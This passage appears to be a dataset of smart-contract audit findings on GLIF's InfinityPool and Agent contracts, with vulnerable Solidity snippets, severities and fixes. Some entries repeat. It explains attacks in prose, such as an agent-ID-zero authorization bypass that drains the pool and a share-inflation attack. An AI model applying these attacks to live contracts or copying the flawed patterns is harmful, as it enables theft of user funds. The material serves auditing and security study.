agent and unregister the old agent\\n agents[newAgent] = agentId;\\n // transfer funds from old agent to new agent and mark old agent as decommissioning\\n oldAgent.decommissionAgent(newAgent);\\n // delete the old agent from the registry\\n agents[agent] = 0;\\n}\\n```\\n -InfinityPool is subject to a donation with inflation attack if emtied.чlowчSince `InfinityPool` is an implementation of the ERC4626 vault, it is too susceptible to inflation attacks. An attacker could front-run the first deposit and inflate the share price to an extent where the following deposit will be less than the value of 1 wei of share resulting in 0 shares minted. The attacker could conduct the inflation by means of self-destructing of another contract. In the case of GLIF this attack is less likely on the first pool since GLIF team accepts predeposits so some amount of shares was already minted. We do suggest fixing this issue before the next pool is deployed and no pre-stake is generated.\\n```\\n/\\*//////////////////////////////////////////////////////////////\\n 4626 LOGIC\\n//////////////////////////////////////////////////////////////\\*/\\n\\n/\\*\\*\\n \\* @dev Converts `assets` to shares\\n \\* @param assets The amount of assets to convert\\n \\* @return shares - The amount of shares converted from assets\\n \\*/\\nfunction convertToShares(uint256 assets) public view returns (uint256) {\\n uint256 supply = liquidStakingToken.totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets \\* supply / totalAssets();\\n}\\n\\n/\\*\\*\\n \\* @dev Converts `shares` to assets\\n \\* @param shares The amount of shares to convert\\n \\* @return assets - The amount of assets converted from shares\\n \\*/\\nfunction convertToAssets(uint256 shares) public view returns (uint256) {\\n uint256 supply = liquidStakingToken.totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? shares : shares \\* totalAssets() / supply;\\n}\\n```\\nчSince the pool does not need to accept donations, the easiest way to handle this case is to use virtual price, where the balance of the contract is duplicated in a separate variable.чч```\\n/\\*//////////////////////////////////////////////////////////////\\n 4626 LOGIC\\n//////////////////////////////////////////////////////////////\\*/\\n\\n/\\*\\*\\n \\* @dev Converts `assets` to shares\\n \\* @param assets The amount of assets to convert\\n \\* @return shares - The amount of shares converted from assets\\n \\*/\\nfunction convertToShares(uint256 assets) public view returns (uint256) {\\n uint256 supply = liquidStakingToken.totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets \\* supply / totalAssets();\\n}\\n\\n/\\*\\*\\n \\* @dev Converts `shares` to assets\\n \\* @param shares The amount of shares to convert\\n \\* @return assets - The amount of assets converted from shares\\n \\*/\\nfunction convertToAssets(uint256 shares) public view returns (uint256) {\\n uint256 supply = liquidStakingToken.totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? shares : shares \\* totalAssets() / supply;\\n}\\n```\\n -MaxWithdraw should potentially account for the funds available in the ramp.чlowчSince `InfinityPool` is ERC4626 it should also support the `MaxWithdraw` method. According to the EIP it should include any withdrawal limitation that the participant could encounter. At the moment the `MaxWithdraw` function returns the maximum amount of IOU tokens rather than WFIL. Since IOU token is not the `asset` token of the vault, this behavior is not ideal.\\n```\\nfunction maxWithdraw(address owner) public view returns (uint256) {\\n return convertToAssets(liquidStakingToken.balanceOf(owner));\\n}\\n```\\nчWe suggest considering returning the maximum amount of WFIL withdrawal which should account for Ramp balance.чч```\\nfunction maxWithdraw(address owner) public view returns (uint256) {\\n return convertToAssets(liquidStakingToken.balanceOf(owner));\\n}\\n```\\n -The upgradeability of MinerRegistry, AgentPolice, and Agent is overcomplicated and has a hight chance of errors. AcknowledgedчlowчDuring the engagement, we have identified a few places that signify that the `Agent`, `MinerRegistry` and `AgentPolice` can be upgraded, for example:\\nAbility to migrate the miner from one version of the Agent to another inside the `migrateMiner`.\\nAbility to `refreshRoutes` that would update the `AgentPolice` and `MinerRegistry` addresses for a given Agent.\\nAbility to `decommission` pool. We believe that this functionality is present it is not very well thought through. For example, both `MinerRegistry` and `AgentPolice` are not upgradable but have mappings inside of them.\\n```\\nmapping(uint256 => bool) public liquidated;\\n\\n/// @notice `\\_poolIDs` maps agentID to the pools they have actively borrowed from\\nmapping(uint256 => uint256[]) private \\_poolIDs;\\n\\n/// @notice `\\_credentialUseBlock` maps signature bytes to when a credential was used\\nmapping(bytes32 => uint256) private \\_credentialUseBlock;\\n\\n/// @notice `\\_agentBeneficiaries` maps an Agent ID to its Beneficiary struct\\nmapping(uint256 => AgentBeneficiary) private \\_agentBeneficiaries;\\n```\\n\\n```\\nmapping(bytes32 => bool) private \\_minerRegistered;\\n\\nmapping(uint256 => uint64[]) private \\_minersByAgent;\\n```\\n\\nThat means that any time these contracts would need to be upgraded, the contents of those mappings will need to be somehow recreated in the new contract. That is not trivial since it is not easy to obtain all values of a mapping. This will also require an additional protocol-controlled setter ala kickstart mapping functions that are not ideal.\\nIn the case of `Agent` if the contract was upgradable there would be no need for a process of migrating miners that can be tedious and opens possibilities for errors. Since protocol has a lot of centralization and trust assumptions already, having upgradability will not contribute to it a lot.\\nWe also believe that during the upgrade of the pool, the PoolToken will stay the same in the new pool. That means that the minting and burning permissions of the share tokens have to be carefully updated or checked in a manner that does not require the address of the pool to be constant. Since we did not have access to this file, we can not check if that is done correctly.чConsider using upgradable contracts or have a solid upgrade plan that is well-tested before an emergency situation occurs.чч```\\nmapping(uint256 => bool) public liquidated;\\n\\n/// @notice `\\_poolIDs` maps agentID to the pools they have actively borrowed from\\nmapping(uint256 => uint256[]) private \\_poolIDs;\\n\\n/// @notice `\\_credentialUseBlock` maps signature bytes to when a credential was used\\nmapping(bytes32 => uint256) private \\_credentialUseBlock;\\n\\n/// @notice `\\_agentBeneficiaries` maps an Agent ID to its Beneficiary struct\\nmapping(uint256 => AgentBeneficiary) private \\_agentBeneficiaries;\\n```\\n -Mint function in the Infinity pool will emit the incorrect value.чlowчIn the `InifinityPool` file the `mint` function recomputes the amount of the assets before emitting the event. While this is fine in a lot of cases, that will not always be true. The result of `previewMint` and `convertToAssets` will only be equal while the `totalAssets` and `totalSupply` are equal. For example, this assumption will break after the first liquidation.\\n```\\nfunction mint(uint256 shares, address receiver) public isOpen returns (uint256 assets) {\\n if(shares == 0) revert InvalidParams();\\n // These transfers need to happen before the mint, and this is forcing a higher degree of coupling than is ideal\\n assets = previewMint(shares);\\n asset.transferFrom(msg.sender, address(this), assets);\\n liquidStakingToken.mint(receiver, shares);\\n assets = convertToAssets(shares);\\n emit Deposit(msg.sender, receiver, assets, shares);\\n}\\n```\\nчUse the `assets` value computed by the `previewMint` when emitting the event.чч```\\nfunction mint(uint256 shares, address receiver) public isOpen returns (uint256 assets) {\\n if(shares == 0) revert InvalidParams();\\n // These transfers need to happen before the mint, and this is forcing a higher degree of coupling than is ideal\\n assets = previewMint(shares);\\n asset.transferFrom(msg.sender, address(this), assets);\\n liquidStakingToken.mint(receiver, shares);\\n assets = convertToAssets(shares);\\n emit Deposit(msg.sender, receiver, assets, shares);\\n}\\n```\\n -Potential overpayment due to rounding imprecision Won't FixчlowчInside the `InifintyPool` the `pay` function might accept unaccounted files. Imagine a situation where an Agent is trying to repay only the fees portion of the debt. In that case, the following branch will be executed:\\n```\\nif (vc.value <= interestOwed) {\\n // compute the amount of epochs this payment covers\\n // vc.value is not WAD yet, so divWadDown cancels the extra WAD in interestPerEpoch\\n uint256 epochsForward = vc.value.divWadDown(interestPerEpoch);\\n // update the account's `epochsPaid` cursor\\n account.epochsPaid += epochsForward;\\n // since the entire payment is interest, the entire payment is used to compute the fee (principal payments are fee-free)\\n feeBasis = vc.value;\\n} else {\\n```\\n\\nThe issue is if the `value` does not divide by the `interestPerEpoch` exactly, any remainder will remain in the InfinityPool.\\n```\\nuint256 epochsForward = vc.value.divWadDown(interestPerEpoch);\\n```\\nчSince the remainder will most likely not be too large this is not critical, but ideally, those remaining funds would be included in the `refund` variable.чч```\\nif (vc.value <= interestOwed) {\\n // compute the amount of epochs this payment covers\\n // vc.value is not WAD yet, so divWadDown cancels the extra WAD in interestPerEpoch\\n uint256 epochsForward = vc.value.divWadDown(interestPerEpoch);\\n // update the account's `epochsPaid` cursor\\n account.epochsPaid += epochsForward;\\n // since the entire payment is interest, the entire payment is used to compute the fee (principal payments are fee-free)\\n feeBasis = vc.value;\\n} else {\\n```\\n -jumpStartAccount should be subject to the same approval checks as regular borrow.чlowч`InfinityPool` contract has the ability to kick start an account that will have a debt position in this pool.\\n```\\nfunction jumpStartAccount(address receiver, uint256 agentID, uint256 accountPrincipal) external onlyOwner {\\n Account memory account = \\_getAccount(agentID);\\n // if the account is already initialized, revert\\n if (account.principal != 0) revert InvalidState();\\n // create the account\\n account.principal = accountPrincipal;\\n account.startEpoch = block.number;\\n account.epochsPaid = block.number;\\n // save the account\\n account.save(router, agentID, id);\\n // add the pool to the agent's list of borrowed pools\\n GetRoute.agentPolice(router).addPoolToList(agentID, id);\\n // mint the iFIL to the receiver, using principal as the deposit amount\\n liquidStakingToken.mint(receiver, convertToShares(accountPrincipal));\\n // account for the new principal in the total borrowed of the pool\\n totalBorrowed += accountPrincipal;\\n}\\n```\\nчWe suggest that this action is subject to the same rules as the standard borrow action. Thus checks on DTE, LTV and DTI should be done if possible.чч```\\nfunction jumpStartAccount(address receiver, uint256 agentID, uint256 accountPrincipal) external onlyOwner {\\n Account memory account = \\_getAccount(agentID);\\n // if the account is already initialized, revert\\n if (account.principal != 0) revert InvalidState();\\n // create the account\\n account.principal = accountPrincipal;\\n account.startEpoch = block.number;\\n account.epochsPaid = block.number;\\n // save the account\\n account.save(router, agentID, id);\\n // add the pool to the agent's list of borrowed pools\\n GetRoute.agentPolice(router).addPoolToList(agentID, id);\\n // mint the iFIL to the receiver, using principal as the deposit amount\\n liquidStakingToken.mint(receiver, convertToShares(accountPrincipal));\\n // account for the new principal in the total borrowed of the pool\\n totalBorrowed += accountPrincipal;\\n}\\n```\\n -InfinityPool Contract Authorization Bypass AttackчhighчAn attacker could create their own credential and set the `Agent` ID to `0`, which would bypass the `subjectIsAgentCaller` modifier. The attacker could use this attack to `borrow` funds from the pool, draining any available liquidity. For example, only an `Agent` should be able to `borrow` funds from the pool and call the `borrow` function:\\n```\\nfunction borrow(VerifiableCredential memory vc) external isOpen subjectIsAgentCaller(vc) {\\n // 1e18 => 1 FIL, can't borrow less than 1 FIL\\n if (vc.value < WAD) revert InvalidParams();\\n // can't borrow more than the pool has\\n if (totalBorrowableAssets() < vc.value) revert InsufficientLiquidity();\\n Account memory account = \\_getAccount(vc.subject);\\n // fresh account, set start epoch and epochsPaid to beginning of current window\\n if (account.principal == 0) {\\n uint256 currentEpoch = block.number;\\n account.startEpoch = currentEpoch;\\n account.epochsPaid = currentEpoch;\\n GetRoute.agentPolice(router).addPoolToList(vc.subject, id);\\n }\\n\\n account.principal += vc.value;\\n account.save(router, vc.subject, id);\\n\\n totalBorrowed += vc.value;\\n\\n emit Borrow(vc.subject, vc.value);\\n\\n // interact - here `msg.sender` must be the Agent bc of the `subjectIsAgentCaller` modifier\\n asset.transfer(msg.sender, vc.value);\\n}\\n```\\n\\nThe following modifier checks that the caller is an Agent:\\n```\\nmodifier subjectIsAgentCaller(VerifiableCredential memory vc) {\\n if (\\n GetRoute.agentFactory(router).agents(msg.sender) != vc.subject\\n ) revert Unauthorized();\\n \\_;\\n}\\n```\\n\\nBut if the caller is not an `Agent`, the `GetRoute.agentFactory(router).agents(msg.sender)` will return `0`. And if the `vc.subject` is also zero, the check will be successful with any `msg.sender`. The attacker can also pass an arbitrary `vc.value` as the parameter and steal all the funds from the pool.чEnsure only an `Agent` can call `borrow` and pass the `subjectIsAgentCaller` modifier.чч```\\nfunction borrow(VerifiableCredential memory vc) external isOpen subjectIsAgentCaller(vc) {\\n // 1e18 => 1 FIL, can't borrow less than 1 FIL\\n if (vc.value < WAD) revert InvalidParams();\\n // can't borrow more than the pool has\\n if (totalBorrowableAssets() < vc.value) revert InsufficientLiquidity();\\n Account memory account = \\_getAccount(vc.subject);\\n // fresh account, set start epoch and epochsPaid to beginning of current window\\n if (account.principal == 0) {\\n uint256 currentEpoch = block.number;\\n account.startEpoch = currentEpoch;\\n account.epochsPaid = currentEpoch;\\n GetRoute.agentPolice(router).addPoolToList(vc.subject, id);\\n }\\n\\n account.principal += vc.value;\\n account.save(router, vc.subject, id);\\n\\n totalBorrowed += vc.value;\\n\\n emit Borrow(vc.subject, vc.value);\\n\\n // interact - here `msg.sender` must be the Agent bc of the `subjectIsAgentCaller` modifier\\n asset.transfer(msg.sender, vc.value);\\n}\\n```\\n -Wrong Accounting for totalBorrowed in the InfinityPool.writeOff FunctionчhighчHere is a part of the `InfinityPool.writeOff` function:\\n```\\n// transfer the assets into the pool\\n// whatever we couldn't pay back\\nuint256 lostAmt = principalOwed > recoveredFunds ? principalOwed - recoveredFunds : 0;\\n\\nuint256 totalOwed = interestPaid + principalOwed;\\n\\nasset.transferFrom(\\n msg.sender,\\n address(this),\\n totalOwed > recoveredFunds ? recoveredFunds : totalOwed\\n);\\n// write off only what we lost\\ntotalBorrowed -= lostAmt;\\n// set the account with the funds the pool lost\\naccount.principal = lostAmt;\\n\\naccount.save(router, agentID, id);\\n```\\n\\nThe `totalBorrowed` is decreased by the `lostAmt` value. Instead, it should be decreased by the original `account.principal` value to acknowledge the loss.чResolution\\nFixed.чч```\\n// transfer the assets into the pool\\n// whatever we couldn't pay back\\nuint256 lostAmt = principalOwed > recoveredFunds ? principalOwed - recoveredFunds : 0;\\n\\nuint256 totalOwed = interestPaid + principalOwed;\\n\\nasset.transferFrom(\\n msg.sender,\\n address(this),\\n totalOwed > recoveredFunds ? recoveredFunds : totalOwed\\n);\\n// write off only what we lost\\ntotalBorrowed -= lostAmt;\\n// set the account with the funds the pool lost\\naccount.principal = lostAmt;\\n\\naccount.save(router, agentID, id);\\n```\\n -The beneficiaryWithdrawable Function Can Be Called by AnyoneчhighчThe `beneficiaryWithdrawable` function is supposed to be called by the Agent when a beneficiary is trying to withdraw funds:\\n```\\nfunction beneficiaryWithdrawable(\\n address recipient,\\n address sender,\\n uint256 agentID,\\n uint256 proposedAmount\\n) external returns (\\n uint256 amount\\n) {\\n AgentBeneficiary memory beneficiary = \\_agentBeneficiaries[agentID];\\n address benneficiaryAddress = beneficiary.active.beneficiary;\\n // If the sender is not the owner of the Agent or the beneficiary, revert\\n if(\\n !(benneficiaryAddress == sender || (IAuth(msg.sender).owner() == sender && recipient == benneficiaryAddress) )) {\\n revert Unauthorized();\\n }\\n (\\n beneficiary,\\n amount\\n ) = beneficiary.withdraw(proposedAmount);\\n // update the beneficiary in storage\\n \\_agentBeneficiaries[agentID] = beneficiary;\\n}\\n```\\n\\nThis function reduces the quota that is supposed to be transferred during the `withdraw` call:\\n```\\n sendAmount = agentPolice.beneficiaryWithdrawable(receiver, msg.sender, id, sendAmount);\\n}\\nelse if (msg.sender != owner()) {\\n revert Unauthorized();\\n}\\n\\n// unwrap any wfil needed to withdraw\\n\\_poolFundsInFIL(sendAmount);\\n// transfer funds\\npayable(receiver).sendValue(sendAmount);\\n```\\n\\nThe issue is that anyone can call this function directly, and the quota will be reduced without funds being transferred.чEnsure only the Agent can call this function.чч```\\nfunction beneficiaryWithdrawable(\\n address recipient,\\n address sender,\\n uint256 agentID,\\n uint256 proposedAmount\\n) external returns (\\n uint256 amount\\n) {\\n AgentBeneficiary memory beneficiary = \\_agentBeneficiaries[agentID];\\n address benneficiaryAddress = beneficiary.active.beneficiary;\\n // If the sender is not the owner of the Agent or the beneficiary, revert\\n if(\\n !(benneficiaryAddress == sender || (IAuth(msg.sender).owner() == sender && recipient == benneficiaryAddress) )) {\\n revert Unauthorized();\\n }\\n (\\n beneficiary,\\n amount\\n ) = beneficiary.withdraw(proposedAmount);\\n // update the beneficiary in storage\\n \\_agentBeneficiaries[agentID] = beneficiary;\\n}\\n```\\n -An Agent Can Borrow Even With Existing Debt in Interest PaymentsчmediumчTo `borrow` funds, an `Agent` has to call the `borrow` function of the pool:\\n```\\nfunction borrow(VerifiableCredential memory vc) external isOpen subjectIsAgentCaller(vc) {\\n // 1e18 => 1 FIL, can't borrow less than 1 FIL\\n if (vc.value < WAD) revert InvalidParams();\\n // can't borrow more than the pool has\\n if (totalBorrowableAssets() < vc.value) revert InsufficientLiquidity();\\n Account memory account = \\_getAccount(vc.subject);\\n // fresh account, set start epoch and epochsPaid to beginning of current window\\n if (account.principal == 0) {\\n uint256 currentEpoch = block.number;\\n account.startEpoch = currentEpoch;\\n account.epochsPaid = currentEpoch;\\n GetRoute.agentPolice(router).addPoolToList(vc.subject, id);\\n }\\n\\n account.principal += vc.value;\\n account.save(router, vc.subject, id);\\n\\n totalBorrowed += vc.value;\\n\\n emit Borrow(vc.subject, vc.value);\\n\\n // interact - here `msg.sender` must be the Agent bc of the `subjectIsAgentCaller` modifier\\n asset.transfer(msg.sender, vc.value);\\n}\\n```\\n\\nLet's assume that the `Agent` already had some funds borrowed. During this function execution, the current debt status is not checked. The principal debt increases after borrowing, but `account.epochsPaid` remains the same. So the pending debt will instantly increase as if the borrowing happened on `account.epochsPaid`.чEnsure the debt is paid when borrowing more funds.чч```\\nfunction borrow(VerifiableCredential memory vc) external isOpen subjectIsAgentCaller(vc) {\\n // 1e18 => 1 FIL, can't borrow less than 1 FIL\\n if (vc.value < WAD) revert InvalidParams();\\n // can't borrow more than the pool has\\n if (totalBorrowableAssets() < vc.value) revert InsufficientLiquidity();\\n Account memory account = \\_getAccount(vc.subject);\\n // fresh account, set start epoch and epochsPaid to beginning of current window\\n if (account.principal == 0) {\\n uint256 currentEpoch = block.number;\\n account.startEpoch = currentEpoch;\\n account.epochsPaid = currentEpoch;\\n GetRoute.agentPolice(router).addPoolToList(vc.subject, id);\\n }\\n\\n account.principal += vc.value;\\n account.save(router, vc.subject, id);\\n\\n totalBorrowed += vc.value;\\n\\n emit Borrow(vc.subject, vc.value);\\n\\n // interact - here `msg.sender` must be the Agent bc of the `subjectIsAgentCaller` modifier\\n asset.transfer(msg.sender, vc.value);\\n}\\n```\\n -The AgentPolice.distributeLiquidatedFunds() Function Can Have Undistributed Residual FundsчmediumчWhen an Agent is liquidated, the liquidator (owner of the protocol) is supposed to try to redeem as many funds as possible and re-distribute them to the pools:\\n```\\nfunction distributeLiquidatedFunds(uint256 agentID, uint256 amount) external {\\n if (!liquidated[agentID]) revert Unauthorized();\\n\\n // transfer the assets into the pool\\n GetRoute.wFIL(router).transferFrom(msg.sender, address(this), amount);\\n \\_writeOffPools(agentID, amount);\\n}\\n```\\n\\nThe problem is that in the pool, it's accounted that the amount of funds can be larger than the debt. In that case, the pool won't transfer more funds than the pool needs:\\n```\\nuint256 totalOwed = interestPaid + principalOwed;\\n\\nasset.transferFrom(\\n msg.sender,\\n address(this),\\n totalOwed > recoveredFunds ? recoveredFunds : totalOwed\\n);\\n// write off only what we lost\\ntotalBorrowed -= lostAmt;\\n// set the account with the funds the pool lost\\naccount.principal = lostAmt;\\n\\naccount.save(router, agentID, id);\\n\\nemit WriteOff(agentID, recoveredFunds, lostAmt, interestPaid);\\n```\\n\\nIf that happens, the remaining funds will be stuck in the `AgentPolice` contract.чReturn the residual funds to the Agent's owner or process them in some way so they are not lost.чч```\\nfunction distributeLiquidatedFunds(uint256 agentID, uint256 amount) external {\\n if (!liquidated[agentID]) revert Unauthorized();\\n\\n // transfer the assets into the pool\\n GetRoute.wFIL(router).transferFrom(msg.sender, address(this), amount);\\n \\_writeOffPools(agentID, amount);\\n}\\n```\\n -An Agent Can Be Upgraded Even if There Is No New ImplementationчmediumчAgents can be upgraded to a new implementation, and only the Agent's owner can call the upgrade function:\\n```\\nfunction upgradeAgent(\\n address agent\\n) external returns (address newAgent) {\\n IAgent oldAgent = IAgent(agent);\\n address owner = IAuth(address(oldAgent)).owner();\\n uint256 agentId = agents[agent];\\n // only the Agent's owner can upgrade, and only a registered agent can be upgraded\\n if (owner != msg.sender || agentId == 0) revert Unauthorized();\\n // deploy a new instance of Agent with the same ID and auth\\n newAgent = GetRoute.agentDeployer(router).deploy(\\n router,\\n agentId,\\n owner,\\n IAuth(address(oldAgent)).operator()\\n );\\n // Register the new agent and unregister the old agent\\n agents[newAgent] = agentId;\\n // transfer funds from old agent to new agent and mark old agent as decommissioning\\n oldAgent.decommissionAgent(newAgent);\\n // delete the old agent from the registry\\n agents[agent] = 0;\\n}\\n```\\n\\nThe issue is that the owner can trigger the upgrade even if no new implementation exists. Multiple possible problems derive from it.\\nUpgrading to the current implementation of the Agent will break the logic because the current version is not calling the `migrateMiner` function, so all the miners will stay with the old Agent, and their funds will be lost.\\nThe owner can accidentally trigger multiple upgrades simultaneously, leading to a loss of funds (https://github.com/ConsenSysDiligence/glif-audit-2023-04/issues/2).\\nThe owner also has no control over the new version of the Agent. To increase decentralization, it's better to pass the deployer's address as a parameter additionally.чEnsure the upgrades can only happen when there is a new version of an Agent, and the owner controls this version.чч```\\nfunction upgradeAgent(\\n address agent\\n) external returns (address newAgent) {\\n IAgent oldAgent = IAgent(agent);\\n address owner = IAuth(address(oldAgent)).owner();\\n uint256 agentId = agents[agent];\\n // only the Agent's owner can upgrade, and only a registered agent can be upgraded\\n if (owner != msg.sender || agentId == 0) revert Unauthorized();\\n // deploy a new instance of Agent with the same ID and auth\\n newAgent = GetRoute.agentDeployer(router).deploy(\\n router,\\n agentId,\\n owner,\\n IAuth(address(oldAgent)).operator()\\n );\\n // Register the new agent and unregister the old agent\\n agents[newAgent] = agentId;\\n // transfer funds from old agent to new agent and mark old agent as decommissioning\\n oldAgent.decommissionAgent(newAgent);\\n // delete the old agent from the registry\\n agents[agent] = 0;\\n}\\n```\\n -Potential Re-Entrancy Issues When Upgrading the ContractsчlowчThe protocol doesn't have any built-in re-entrancy protection mechanisms. That mainly explains by using the `wFIL` token, which is not supposed to give that opportunity. And also by carefully using `FIL` transfers.\\nHowever, there are some places in the code where things may go wrong in the future. For example, when upgrading an Agent:\\n```\\nfunction upgradeAgent(\\n address agent\\n) external returns (address newAgent) {\\n IAgent oldAgent = IAgent(agent);\\n address owner = IAuth(address(oldAgent)).owner();\\n uint256 agentId = agents[agent];\\n // only the Agent's owner can upgrade, and only a registered agent can be upgraded\\n if (owner != msg.sender || agentId == 0) revert Unauthorized();\\n // deploy a new instance of Agent with the same ID and auth\\n newAgent = GetRoute.agentDeployer(router).deploy(\\n router,\\n agentId,\\n owner,\\n IAuth(address(oldAgent)).operator()\\n );\\n // Register the new agent and unregister the old agent\\n agents[newAgent] = agentId;\\n // transfer funds from old agent to new agent and mark old agent as decommissioning\\n oldAgent.decommissionAgent(newAgent);\\n // delete the old agent from the registry\\n agents[agent] = 0;\\n}\\n```\\n\\nHere, we see the `oldAgent.decommissionAgent(newAgent);` call happens before the `oldAgent` is deleted. Inside this function, we see:\\n```\\nfunction decommissionAgent(address \\_newAgent) external {\\n // only the agent factory can decommission an agent\\n AuthController.onlyAgentFactory(router, msg.sender);\\n // if the newAgent has a mismatching ID, revert\\n if(IAgent(\\_newAgent).id() != id) revert Unauthorized();\\n // set the newAgent in storage, which marks the upgrade process as starting\\n newAgent = \\_newAgent;\\n uint256 \\_liquidAssets = liquidAssets();\\n // Withdraw all liquid funds from the Agent to the newAgent\\n \\_poolFundsInFIL(\\_liquidAssets);\\n // transfer funds to new agent\\n payable(\\_newAgent).sendValue(\\_liquidAssets);\\n}\\n```\\n\\nHere, the FIL is transferred to a new contract which is currently unimplemented and unknown. Potentially, the fallback function of this contract could trigger a re-entrancy attack. If that's the case, during the execution of this function, there will be two contracts that are active agents with the same ID, and the attacker can try to use that maliciously.чBe very cautious with further implementations of agents and pools. Also, consider using reentrancy protection in public functions.чч```\\nfunction upgradeAgent(\\n address agent\\n) external returns (address newAgent) {\\n IAgent oldAgent = IAgent(agent);\\n address owner = IAuth(address(oldAgent)).owner();\\n uint256 agentId = agents[agent];\\n // only the Agent's owner can upgrade, and only a registered agent can be upgraded\\n if (owner != msg.sender || agentId == 0) revert Unauthorized();\\n // deploy a new instance of Agent with the same ID and auth\\n newAgent = GetRoute.agentDeployer(router).deploy(\\n router,\\n agentId,\\n owner,\\n IAuth(address(oldAgent)).operator()\\n );\\n // Register the new agent and unregister the old agent\\n agents[newAgent] = agentId;\\n // transfer funds from old agent to new agent and mark old agent as decommissioning\\n oldAgent.decommissionAgent(newAgent);\\n // delete the old agent from the registry\\n agents[agent] = 0;\\n}\\n```\\n -InfinityPool Is Subject to a Donation With Inflation Attack if Emtied.чlowчSince `InfinityPool` is an implementation of the ERC4626 vault, it is too susceptible to inflation attacks. An attacker could front-run the first deposit and inflate the share price to an extent where the following deposit will be less than the value of 1 wei of share resulting in 0 shares minted. The attacker could conduct the inflation by means of self-destructing of another contract. In the case of GLIF this attack is less likely on the first pool since GLIF team accepts predeposits so some amount of shares was already minted. We do suggest fixing this issue before the next pool is deployed and no pre-stake is generated.\\n```\\n/\\*//////////////////////////////////////////////////////////////\\n 4626 LOGIC\\n//////////////////////////////////////////////////////////////\\*/\\n\\n/\\*\\*\\n \\* @dev Converts `assets` to shares\\n \\* @param assets The amount of assets to convert\\n \\* @return shares - The amount of shares converted from assets\\n \\*/\\nfunction convertToShares(uint256 assets) public view returns (uint256) {\\n uint256 supply = liquidStakingToken.totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets \\* supply / totalAssets();\\n}\\n\\n/\\*\\*\\n \\* @dev Converts `shares` to assets\\n \\* @param shares The amount of shares to convert\\n \\* @return assets - The amount of assets converted from shares\\n \\*/\\nfunction convertToAssets(uint256 shares) public view returns (uint256) {\\n uint256 supply = liquidStakingToken.totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? shares : shares \\* totalAssets() / supply;\\n}\\n```\\nчSince the pool does not need to accept donations, the easiest way to handle this case is to use virtual price, where the balance of the contract is duplicated in a separate variable.чч```\\n/\\*//////////////////////////////////////////////////////////////\\n 4626 LOGIC\\n//////////////////////////////////////////////////////////////\\*/\\n\\n/\\*\\*\\n \\* @dev Converts `assets` to shares\\n \\* @param assets The amount of assets to convert\\n \\* @return shares - The amount of shares converted from assets\\n \\*/\\nfunction convertToShares(uint256 assets) public view returns (uint256) {\\n uint256 supply = liquidStakingToken.totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets \\* supply / totalAssets();\\n}\\n\\n/\\*\\*\\n \\* @dev Converts `shares` to assets\\n \\* @param shares The amount of shares to convert\\n \\* @return assets - The amount of assets converted from shares\\n \\*/\\nfunction convertToAssets(uint256 shares) public view returns (uint256) {\\n uint256 supply = liquidStakingToken.totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? shares : shares \\* totalAssets() / supply;\\n}\\n```\\n -MaxWithdraw Should Potentially Account for the Funds Available in the Ramp.чlowчSince `InfinityPool` is ERC4626 it should also support the `MaxWithdraw` method. According to the EIP it should include any withdrawal limitation that the participant could encounter. At the moment the `MaxWithdraw` function returns the maximum amount of IOU tokens rather than WFIL. Since IOU token is not the `asset` token of the vault, this behavior is not ideal.\\n```\\nfunction maxWithdraw(address owner) public view returns (uint256) {\\n return convertToAssets(liquidStakingToken.balanceOf(owner));\\n}\\n```\\nчWe suggest considering returning the maximum amount of WFIL withdrawal which should account for Ramp balance.чч```\\nfunction maxWithdraw(address owner) public view returns (uint256) {\\n return convertToAssets(liquidStakingToken.balanceOf(owner));\\n}\\n```\\n -The Upgradeability of MinerRegistry, AgentPolice, and Agent Is Overcomplicated and Has a Hight Chance of Errors. AcknowledgedчlowчDuring the engagement, we have identified a few places that signify that the `Agent`, `MinerRegistry` and `AgentPolice` can be upgraded, for example:\\nAbility to migrate the miner from one version of the Agent to another inside the `migrateMiner`.\\nAbility to `refreshRoutes` that would update the `AgentPolice` and `MinerRegistry` addresses for a given Agent.\\nAbility to `decommission` pool. We believe that this functionality is present it is not very well thought through. For example, both `MinerRegistry` and `AgentPolice` are not upgradable but have mappings inside of them.\\n```\\nmapping(uint256 => bool) public liquidated;\\n\\n/// @notice `\\_poolIDs` maps agentID to the pools they have actively borrowed from\\nmapping(uint256 => uint256[]) private \\_poolIDs;\\n\\n/// @notice `\\_credentialUseBlock` maps signature bytes to when a credential was used\\nmapping(bytes32 => uint256) private \\_credentialUseBlock;\\n\\n/// @notice `\\_agentBeneficiaries` maps an Agent ID to its Beneficiary struct\\nmapping(uint256 => AgentBeneficiary) private \\_agentBeneficiaries;\\n```\\n\\n```\\nmapping(bytes32 => bool) private \\_minerRegistered;\\n\\nmapping(uint256 => uint64[]) private \\_minersByAgent;\\n```\\n\\nThat means that any time these contracts would need to be upgraded, the contents of those mappings will need to be somehow recreated in the new contract. That is not trivial since it is not easy to obtain all values of a mapping. This will also require an additional protocol-controlled setter ala kickstart mapping functions that are not ideal.\\nIn the case of `Agent` if the contract was upgradable there would be no need for a process of migrating miners that can be tedious and opens possibilities for errors. Since protocol has a lot of centralization and trust assumptions already, having upgradability will not contribute to it a lot.\\nWe also believe that during the upgrade of the pool, the PoolToken will stay the same in the new pool. That means that the minting and burning permissions of the share tokens have to be carefully updated or checked in a manner that does not require the address of the pool to be constant. Since we did not have access to this file, we can not check if that is done correctly.чConsider using upgradable contracts or have a solid upgrade plan that is well-tested before an emergency situation occurs.чч```\\nmapping(uint256 => bool) public liquidated;\\n\\n/// @notice `\\_poolIDs` maps agentID to the pools they have actively borrowed from\\nmapping(uint256 => uint256[]) private \\_poolIDs;\\n\\n/// @notice `\\_credentialUseBlock` maps signature bytes to when a credential was used\\nmapping(bytes32 => uint256) private \\_credentialUseBlock;\\n\\n/// @notice `\\_agentBeneficiaries` maps an Agent ID to its Beneficiary struct\\nmapping(uint256 => AgentBeneficiary) private \\_agentBeneficiaries;\\n```\\n -Mint Function in the Infinity Pool Will Emit the Incorrect Value.чlowчIn the `InifinityPool` file the `mint` function recomputes the amount of 